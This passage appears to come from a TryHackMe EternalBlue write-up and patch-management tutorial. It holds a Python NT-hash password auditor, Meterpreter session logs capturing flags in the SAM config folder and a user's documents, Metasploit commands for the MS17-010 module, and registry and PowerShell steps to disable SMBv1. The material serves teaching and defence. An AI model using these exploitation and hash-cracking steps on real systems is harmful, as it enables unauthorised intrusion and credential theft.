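        x = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for func, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                a, b, c, d = d, rotl((a + func(b, c, d) + x[idx] + k) & mask, shifts[i % 4]), b, c
        a0, b0, c0, d0 = (a0 + a) & mask, (b0 + b) & mask, (c0 + c) & mask, (d0 + d) & mask
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), hex-encoded, no salt."""
    return md4(password.encode("utf-16-le")).hex()


def parse_dump(text: str) -> list:
    """Parse hashdump lines; reject anything that is not a well-formed entry."""
    entries = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        m = LINE_RE.match(line.strip())
        if not m:
            raise ValueError(f"line {n}: not a valid user:id:lm:nt::: entry")
        user, uid, lm, nt = m.groups()
        entries.append({"user": user, "uid": int(uid), "lm": lm.lower(), "nt": nt.lower()})
    return entries


def audit(entries: list, banned_words: list) -> dict:
    """Hash the wordlist once, then look every account up in that table: with
    no salt, one table serves all accounts, which is why NT hashes fall fast."""
    lookup = {nt_hash(w): w for w in banned_words}
    result = {}
    for e in entries:
        issues = []
        if e["nt"] == EMPTY_NT:
            issues.append("empty-password")
        if e["lm"] != EMPTY_LM:
            issues.append("lm-hash-stored")
        if e["nt"] in lookup:
            issues.append(f"banned-word:{lookup[e['nt']]}")
        result[e["user"]] = issues
    return result


if __name__ == "__main__":
    for user, issues in audit(parse_dump(SAMPLE_DUMP), BANNED_WORDS).items():
        print(f"{user:14} {', '.join(issues) or 'no findings'}")
```

On the sample dump, Administrator and Guest carry the empty-password hash (typical for disabled built-in accounts), and Jon's hash matches the banned word John recovered above. The defensive reading of the same result is that unsalted NT hashes make any short or listed password cheap to recover, so the controls that matter are long passwords, no LM storage, and retiring NTLM where possible.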
Flag 1
(Meterpreter 2)(C:\Windows\system32) > cd /
(Meterpreter 2)(C:\) > ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2018-12-13 08:43:36 +0530 $Recycle.Bin
040777/rwxrwxrwx 0 dir 2009-07-14 10:38:56 +0530 Documents and Settings
040777/rwxrwxrwx 0 dir 2009-07-14 08:50:08 +0530 PerfLogs
040555/r-xr-xr-x 4096 dir 2019-03-18 03:52:01 +0530 Program Files
040555/r-xr-xr-x 4096 dir 2019-03-18 03:58:38 +0530 Program Files (x86)
040777/rwxrwxrwx 4096 dir 2019-03-18 04:05:57 +0530 ProgramData
040777/rwxrwxrwx 0 dir 2018-12-13 08:43:22 +0530 Recovery
040777/rwxrwxrwx 4096 dir 2019-03-18 04:05:55 +0530 System Volume Information
040555/r-xr-xr-x 4096 dir 2018-12-13 08:43:28 +0530 Users
040777/rwxrwxrwx 16384 dir 2019-03-18 04:06:30 +0530 Windows
100666/rw-rw-rw- 24 fil 2019-03-18 00:57:21 +0530 flag1.txt
000000/--------- 0 fif 1970-01-01 05:30:00 +0530 hiberfil.sys
000000/--------- 0 fif 1970-01-01 05:30:00 +0530 pagefile.sys
(Meterpreter 2)(C:\) > cat flag1.txt
flag{access_the_machine}
- Flag1 :
flag{access_the_machine}
Flag 2
(Meterpreter 2)(C:\) > cd Windows\\System32\\config\\
(Meterpreter 2)(C:\Windows\System32\config) > ls
Listing: C:\Windows\System32\config
===================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 28672 fil 2018-12-13 04:30:40 +0530 BCD-Template
100666/rw-rw-rw- 25600 fil 2018-12-13 04:30:40 +0530 BCD-Template.LOG
100666/rw-rw-rw- 18087936 fil 2025-01-25 14:03:28 +0530 COMPONENTS
100666/rw-rw-rw- 1024 fil 2011-04-12 14:02:10 +0530 COMPONENTS.LOG
100666/rw-rw-rw- 13312 fil 2025-01-25 14:03:28 +0530 COMPONENTS.LOG1
100666/rw-rw-rw- 0 fil 2009-07-14 08:04:08 +0530 COMPONENTS.LOG2
100666/rw-rw-rw- 1048576 fil 2025-01-25 13:53:58 +0530 COMPONENTS{016888b8-6c6f-11de-8d1d-001e0bcde3ec}.TxR.0.regtrans-ms
100666/rw-rw-rw- 1048576 fil 2025-01-25 13:53:58 +0530 COMPONENTS{016888b8-6c6f-11de-8d1d-001e0bcde3ec}.TxR.1.regtrans-ms
100666/rw-rw-rw- 1048576 fil 2025-01-25 13:53:58 +0530 COMPONENTS{016888b8-6c6f-11de-8d1d-001e0bcde3ec}.TxR.2.regtrans-ms
100666/rw-rw-rw- 65536 fil 2025-01-25 13:53:58 +0530 COMPONENTS{016888b8-6c6f-11de-8d1d-001e0bcde3ec}.TxR.blf
100666/rw-rw-rw- 65536 fil 2018-12-13 08:50:57 +0530 COMPONENTS{016888b9-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw- 524288 fil 2018-12-13 08:50:57 +0530 COMPONENTS{016888b9-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2009-07-14 10:31:27 +0530 COMPONENTS{016888b9-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
100666/rw-rw-rw- 262144 fil 2025-01-25 14:03:08 +0530 DEFAULT
100666/rw-rw-rw- 1024 fil 2011-04-12 14:02:10 +0530 DEFAULT.LOG
100666/rw-rw-rw- 177152 fil 2025-01-25 14:03:08 +0530 DEFAULT.LOG1
100666/rw-rw-rw- 0 fil 2009-07-14 08:04:08 +0530 DEFAULT.LOG2
100666/rw-rw-rw- 65536 fil 2019-03-18 03:52:17 +0530 DEFAULT{016888b5-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw- 524288 fil 2019-03-18 03:52:17 +0530 DEFAULT{016888b5-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2019-03-18 03:52:17 +0530 DEFAULT{016888b5-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
040777/rwxrwxrwx 0 dir 2009-07-14 08:04:57 +0530 Journal
040777/rwxrwxrwx 4096 dir 2019-03-18 01:26:54 +0530 RegBack
100666/rw-rw-rw- 262144 fil 2019-03-18 01:35:08 +0530 SAM
100666/rw-rw-rw- 1024 fil 2011-04-12 14:02:10 +0530 SAM.LOG
100666/rw-rw-rw- 21504 fil 2019-03-18 04:09:12 +0530 SAM.LOG1
100666/rw-rw-rw- 0 fil 2009-07-14 08:04:08 +0530 SAM.LOG2
100666/rw-rw-rw- 65536 fil 2019-03-18 03:52:17 +0530 SAM{016888c1-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw- 524288 fil 2019-03-18 03:52:17 +0530 SAM{016888c1-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2019-03-18 03:52:17 +0530 SAM{016888c1-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
100666/rw-rw-rw- 262144 fil 2025-01-25 14:03:13 +0530 SECURITY
100666/rw-rw-rw- 1024 fil 2011-04-12 14:02:10 +0530 SECURITY.LOG
100666/rw-rw-rw- 21504 fil 2025-01-25 14:03:13 +0530 SECURITY.LOG1
100666/rw-rw-rw- 0 fil 2009-07-14 08:04:08 +0530 SECURITY.LOG2
100666/rw-rw-rw- 65536 fil 2019-03-18 03:52:17 +0530 SECURITY{016888c5-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw- 524288 fil 2019-03-18 03:52:17 +0530 SECURITY{016888c5-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2019-03-18 03:52:17 +0530 SECURITY{016888c5-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
100666/rw-rw-rw- 40632320 fil 2025-01-25 14:06:59 +0530 SOFTWARE
100666/rw-rw-rw- 1024 fil 2011-04-12 14:02:10 +0530 SOFTWARE.LOG
100666/rw-rw-rw- 262144 fil 2025-01-25 14:06:59 +0530 SOFTWARE.LOG1
100666/rw-rw-rw- 0 fil 2009-07-14 08:04:08 +0530 SOFTWARE.LOG2
100666/rw-rw-rw- 65536 fil 2019-03-18 03:51:19 +0530 SOFTWARE{016888c9-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw- 524288 fil 2019-03-18 03:51:19 +0530 SOFTWARE{016888c9-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2019-03-18 03:51:19 +0530 SOFTWARE{016888c9-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
100666/rw-rw-rw- 12582912 fil 2025-01-25 14:06:32 +0530 SYSTEM
100666/rw-rw-rw- 1024 fil 2011-04-12 14:02:06 +0530 SYSTEM.LOG
100666/rw-rw-rw- 262144 fil 2025-01-25 14:06:32 +0530 SYSTEM.LOG1
100666/rw-rw-rw- 0 fil 2009-07-14 08:04:08 +0530 SYSTEM.LOG2
100666/rw-rw-rw- 65536 fil 2019-03-18 03:51:22 +0530 SYSTEM{016888cd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw- 524288 fil 2019-03-18 03:51:22 +0530 SYSTEM{016888cd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2019-03-18 03:51:22 +0530 SYSTEM{016888cd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
040777/rwxrwxrwx 4096 dir 2018-12-13 04:33:05 +0530 TxR
100666/rw-rw-rw- 34 fil 2019-03-18 01:02:48 +0530 flag2.txt
040777/rwxrwxrwx 4096 dir 2010-11-21 08:11:37 +0530 systemprofile
(Meterpreter 2)(C:\Windows\System32\config) > cat flag2.txt
flag{sam_database_elevated_access}
- Flag2: flag{sam_database_elevated_access}
Flag 3
(Meterpreter 2)(C:\) > cd /
(Meterpreter 2)(C:\) > cd Users\\
(Meterpreter 2)(C:\Users) > ls
Listing: C:\Users
=================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2009-07-14 10:38:56 +0530 All Users
040555/r-xr-xr-x 8192 dir 2009-07-14 12:37:31 +0530 Default
040777/rwxrwxrwx 0 dir 2009-07-14 10:38:56 +0530 Default User
040777/rwxrwxrwx 8192 dir 2018-12-13 08:43:45 +0530 Jon
040555/r-xr-xr-x 4096 dir 2011-04-12 13:58:15 +0530 Public
100666/rw-rw-rw- 174 fil 2009-07-14 10:24:24 +0530 desktop.ini
(Meterpreter 2)(C:\Users) > cd Jon\\Documents\\
(Meterpreter 2)(C:\Users\Jon\Documents) > ls
Listing: C:\Users\Jon\Documents
===============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2018-12-13 08:43:31 +0530 My Music
040777/rwxrwxrwx 0 dir 2018-12-13 08:43:31 +0530 My Pictures
040777/rwxrwxrwx 0 dir 2018-12-13 08:43:31 +0530 My Videos
100666/rw-rw-rw- 402 fil 2018-12-13 08:43:48 +0530 desktop.ini
100666/rw-rw-rw- 37 fil 2019-03-18 00:56:36 +0530 flag3.txt
(Meterpreter 2)(C:\Users\Jon\Documents) > cat flag3.txt
flag{admin_documents_can_be_valuable}
- Flag3: flag{admin_documents_can_be_valuable}
Patch Management
The process of identifying, acquiring, testing, and installing software updates (called patches) on systems and applications to fix security vulnerabilities, bugs, or performance issues.
In simple terms → this is how a Patch Management Engineer keeps an organization's systems secure and up to date.
Why Patch Management Matters
- Security: Most cyberattacks exploit known vulnerabilities. Applying patches closes those security holes before attackers can use them.
- Stability: Patches also fix system crashes, performance issues, and compatibility problems.
- Compliance: Many regulations (like ISO 27001, PCI-DSS, HIPAA) require regular patching as part of security hygiene.
- Reliability: Systems stay more stable and perform better when regularly updated.
Patch Management Process
A good patch management cycle includes:
- Asset Discovery → Identify all devices and software in your environment.
- Vulnerability Assessment → Determine which systems are missing patches or updates.
- Patch Prioritization → Rank patches by severity (critical → low).
- Testing → Test patches in a controlled environment before wide deployment.
- Deployment → Apply patches to production systems in a phased or automated manner.
- Verification → Confirm patches were successfully installed.
- Documentation & Reporting → Maintain records for audits and compliance.
Example: Patch Management for EternalBlue (MS17-010)
The EternalBlue exploit (MS17-010) targeted a flaw in Microsoft’s SMBv1 protocol. Systems that hadn’t applied Microsoft’s March 2017 security update were vulnerable to remote code execution.
Effective patch management here would mean:
- Detecting unpatched Windows 7 / Server 2008 systems.
- Applying the MS17-010 update from Microsoft.
- Disabling SMBv1 to mitigate future risks.
- Verifying that updates were successfully applied.
Lab setup & quick Metasploit verification (EternalBlue)
I built a small lab to demonstrate the EternalBlue (MS17-010) scenario. Apart from the TryHackMe challenge, I used a victim machine running Windows 7 Ultimate (Service Pack 1) and an attacker machine running Kali Linux. Since the full exploitation process is already covered above, I’ll skip the step-by-step attack here and show how to verify whether the target is vulnerable using Metasploit and then patch the vulnerability.
Step 1: Check the victim OS details → confirm the Windows version and service pack on the victim.
Step 2: Check the victim IP → identify the target IP address to scan/verify.
Step 3: Verify vulnerability with Metasploit → set the module and run the check action.
- Select the EternalBlue module:
use exploit/windows/smb/ms17_010_eternalblue
- Set the target host:
set rhosts 10.4.4.133
- Verify whether the target is vulnerable:
check
- Now attack the system and gain access
- Command to execute the attack:
run
- Verify the victim's details:
sysinfo
Note: Now it’s time for patch management. There are many ways to do this, but here I’ll show the change I made: disabling SMBv1 by editing the Windows registry on the target machine. That reduces exposure to EternalBlue and similar SMB-based exploits.
Method 1: Using CLI (Registry) → I did this in my lab
Note: Run CMD as Administrator, and back up the registry or create a system restore point before making changes.
Steps I followed
1. Back up the registry:
rem Export a registry snapshot (save this file somewhere safe)
reg export "HKLM\SYSTEM\CurrentControlSet\Services" C:\temp\registry-backup-SYSTEM.reg
2. Disable the SMBv1 server component:
reg add "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v SMB1 /t REG_DWORD /d 0 /f
3. Reboot the machine to apply the change:
shutdown /r /t 0
Notes & warnings:
- Run these commands with Administrator privileges on CMD.
- Back up the registry (or create a system restore point) before editing.
- Disabling SMBv1 can break very old applications or devices that require it; test in a lab first.
- After reboot, verify SMBv1 is disabled (you can re-run vulnerability checks or inspect the registry values).
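The four bullets under the EternalBlue example above (detect unpatched hosts, apply the update, disable SMBv1, verify) and the Method 1 registry change can be run together as one audit-and-remediate script. The following is an added example, not code from the original post or from TryHackMe. It runs on the Windows 7 / Server 2008 R2 host itself from an elevated PowerShell prompt; without `-Remediate` it only reports. The function names, the backup folder and the `-Remediate` switch are this example's own choices, and the KB list is an assumption (the March 2017 MS17-010 updates for Windows 7 SP1): later cumulative rollups supersede those KBs, so a missing KB is a hint to investigate, not proof the host is exposed.

```powershell
# Added example (not code from the original post): walk the EternalBlue
# patch-management steps on one host: detect, remediate (same registry change
# as Method 1, backup included) and verify. Run from an elevated PowerShell.
# Assumptions: function names, backup folder and -Remediate switch are this
# example's own; the KB list is assumed to be the March 2017 MS17-010 updates
# for Windows 7 SP1 / Server 2008 R2. Later rollups supersede them, so a
# missing KB is a hint to investigate, not proof of exposure.
param(
    [switch]$Remediate,              # without it the script only reports
    [string]$BackupDir = 'C:\temp'   # where the .reg backup is written
)

$ParamKey   = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$Ms17010Kbs = @('KB4012212', 'KB4012215')   # assumption, see header comment

function Get-Smb1ServerStatus {
    # Windows 7 enables the SMBv1 server by default, so an absent value means "enabled".
    $prop = Get-ItemProperty -Path $ParamKey -Name SMB1 -ErrorAction SilentlyContinue
    if ($prop -eq $null)  { return 'Enabled (SMB1 value absent = default)' }
    if ($prop.SMB1 -eq 0) { return 'Disabled (SMB1=0)' }
    return "Enabled (SMB1=$($prop.SMB1))"
}

function Test-Ms17010Hotfix {
    # Returns the first listed KB that is installed, or $null if none is.
    $installed = Get-HotFix | ForEach-Object { $_.HotFixID }
    foreach ($kb in $Ms17010Kbs) {
        if ($installed -contains $kb) { return $kb }
    }
    return $null
}

function Backup-ServicesKey([string]$Dir) {
    # Same backup as Method 1 ("reg export ..."), with a timestamped file name.
    if (-not (Test-Path $Dir)) { New-Item -ItemType Directory -Path $Dir | Out-Null }
    $file = Join-Path $Dir ('Services-backup-{0:yyyyMMdd-HHmmss}.reg' -f (Get-Date))
    & reg.exe export 'HKLM\SYSTEM\CurrentControlSet\Services' $file /y | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "Registry backup failed (exit code $LASTEXITCODE); SMB1 left unchanged." }
    return $file
}

function Disable-Smb1Server {
    # Equivalent of: reg add ...\LanmanServer\Parameters /v SMB1 /t REG_DWORD /d 0 /f
    New-ItemProperty -Path $ParamKey -Name SMB1 -PropertyType DWord -Value 0 -Force | Out-Null
}

# --- Detect: OS, service pack, hotfix state, current SMBv1 setting --------------
$os = Get-WmiObject Win32_OperatingSystem
Write-Host ('Host: {0} | OS: {1} {2} (build {3})' -f $env:COMPUTERNAME, $os.Caption, $os.CSDVersion, $os.BuildNumber)
$kb = Test-Ms17010Hotfix
if ($kb) { Write-Host "MS17-010: $kb is installed" }
else     { Write-Warning ('MS17-010: none of {0} found; check for a later rollup or install the update' -f ($Ms17010Kbs -join ', ')) }
$before = Get-Smb1ServerStatus
Write-Host "SMBv1 server: $before"

# --- Remediate (only with -Remediate), then verify by re-reading the value --------
if ($Remediate -and $before -notlike 'Disabled*') {
    $backup = Backup-ServicesKey $BackupDir
    Write-Host "Registry backup written to $backup"
    Disable-Smb1Server
    $after = Get-Smb1ServerStatus
    Write-Host "SMBv1 server after change: $after"
    if ($after -notlike 'Disabled*') { throw 'SMB1 value did not change; check privileges and the key path.' }
    Write-Host 'Reboot to apply (shutdown /r /t 0), then re-run this script and your vulnerability scan to confirm.'
}
elseif ($Remediate) {
    Write-Host 'SMBv1 server already disabled; nothing to change.'
}
```

Two points worth keeping in mind when using it: the registry value only controls the SMBv1 server (the side EternalBlue reaches over port 445), so the page's registry change and this script are the mitigation step of the list above, while the actual patch is still the MS17-010 update; and the verification here is local, so the final confirmation is the same external check the post uses, re-running the scan against the host after the reboot.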
Method 2: Using GUI (Registry) → I did this in my lab
Note: Run CMD as Administrator, and back up the registry or create a system restore point before making changes.
Steps I followed (Registry Editor)
1. Press Win + R, type regedit, and press Enter.
2. If prompted by UAC, click Yes to run Registry Editor as Administrator.
3. Navigate to the SMB server key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
In the right pane:
- If a DWORD (32-bit) Value named SMB1 exists, double-click it and set Value data to 0.
- If it does not exist, right-click → New → DWORD (32-bit) Value, name it SMB1, then set Value data to 0.
- Click OK to apply the change.
4. Now try to attack the victim
Note: I successfully patched the vulnerability on the lab machine. This demonstrates patch management in action: discovering a security flaw, applying the appropriate fix, and verifying the system is no longer vulnerable. Patch management isn’t just about installing updates; it’s the full process of detection, remediation, and verification that keeps systems secure.